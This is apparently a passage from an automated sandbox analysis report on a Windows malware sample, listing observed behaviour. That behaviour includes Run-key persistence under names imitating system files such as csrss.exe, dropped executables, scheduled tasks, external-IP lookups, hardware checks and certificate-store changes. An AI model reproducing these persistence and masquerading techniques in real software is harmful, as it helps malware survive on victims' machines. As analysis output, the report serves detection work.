| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wzocvkk = "\"C:\\Users\\Admin\\AppData\\Roaming\\Okjeqdz\\Wzocvkk.exe\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\signed.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Service = "C:\\ProgramData\\MsDrvSrvc.exe" | C:\Users\Admin\AppData\Local\Temp\signed.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\72bf7303-5dc0-44e9-87d8-698f8677acab\\kdnmdIr2m3Z75rmoxMQY45zR.exe\" --AutoStart" | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\raBkRkUFhLhqVOsAt.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| File created | C:\Windows\Tasks\bamNpdvhtkzLwlCraC.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
